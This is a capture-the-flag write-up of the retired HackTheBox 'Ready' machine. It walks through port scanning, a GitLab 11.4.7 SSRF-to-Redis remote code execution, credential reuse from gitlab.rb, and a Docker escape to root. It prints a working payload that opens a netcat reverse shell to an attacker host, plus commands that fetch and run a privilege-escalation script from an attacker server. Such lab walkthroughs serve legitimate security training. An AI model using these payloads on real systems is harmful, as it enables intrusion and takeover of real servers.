Introduction

name Ready
Release date 12 Dec 2020
IP 10.10.10.220
OS Linux
Creator bertolis
Points 30
Difficulty Medium
Retired date 15 May 2021

Ready from HackTheBox was a medium machine, it starts with two open ports SSH on 22 and HTTP on 5080 that hosts a gitlab instance, after creating an account we find the gitlab version that is vulnerable to RCE and from there we get shell on the box, after some enumeration we recognize that we are inside a docker container, we escape the restriction of docker to the real system, for me the docker part was interesting since container technology is growing rapidly and learning about it is vital in real pentest.

Summary

Recon

Nmap

Nmap full TCP scan shows us 2 open ports 22, 5080.

sudo nmap -p- --min-rate 2500 -oN my_data/ready/recon/full-tcp 10.129.144.245
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 20:44 UTC
Nmap scan report for 10.129.144.245
Host is up (0.017s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
5080/tcp open  onscreen

Nmap done: 1 IP address (1 host up) scanned in 13.75 seconds

Nmap targeted scan with default scripts and version enummiration against port 22,5080, from OpenSSh version we can guess this is UBuntu 20.04 LTS Focal Fossa.

sudo nmap -p22,5080 -sC -sV -oN my_data/ready/recon/targeted 10.129.144.245
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 20:47 UTC
Nmap scan report for 10.129.144.245
Host is up (0.012s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.129.144.245:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.20 seconds

HTTP port 5080

By visiting HTTP port 5080 we see a default page of Gitlab instance with two options Register or Sign in.

HTTP port 5080 HTTP port 5080
We register a user account for more enumeration.
Register to gitlab instance Register to gitlab instance
And we are logged in (it did not need e-mail confirmation so we used fake one).
Logging in Logging in
After we are logged in we continue the enumeration to find a help page that show Gitlab version 11.4.7 with the message update asap.
Finding gitlab version Finding gitlab version
By finding the Gitlab version it is time to see if any public exploit exist for it, yes there is an RCE and we found an interesting article and video by LiveOverFlow explains it, check it out to understand the RCE better.
Searching for exploits Searching for exploits

Initial shell

Okey it is time to try the RCE.

Step 1

Starts by creating a new project.

Creating new project Creating new project
Clicking on Import project.
Importing project Importing project
We follow that by choosing git Repo by URL.
Importing repo by URL Importing repo by URL

Step 2

Now we use the payload found in the previous mentioned article and video (We chose to url encode it but it can be used without encoding from burpsuite) and here is the payload used

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc attacker_ip 4200 -e /bin/bash \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git

Using payload for reverse shell Using payload for reverse shell
I was lazy so I used an online URL encoder.
URL encoding URL encoding

nc -nvlp 4200

We got a call back from our payload.

Reverse shell Reverse shell

Root shell

After getting an initial shell the trip continue to get a root access so enumerating led us to find a directory called backup in /opt, we found some interesting files inside backup such as docker-compose.yml which make us think we are inside a docker container.

/opt /opt
By checking the content of gitlab.rb we found smtp_password, tried to su with it and voila we are root in the docker container.
gitlab.rb gitlab.rb
By searching how to escape docker container to real system we found this article that helped to get root (the PoC was modified to insert ssh public key in authorized_keys), using python http server to serve the shell script to victim machine.

python3 - m http.server # attacking machine
wget http://atacker_ip:8000/priv.sh # victime macine
chmod +x priv.sh
./priv.sh

priv.sh priv.sh
now we can ssh to the ready machine as root.

ssh -i .ssh/id_rsa.pub root@10.129.144.245
Ready Ready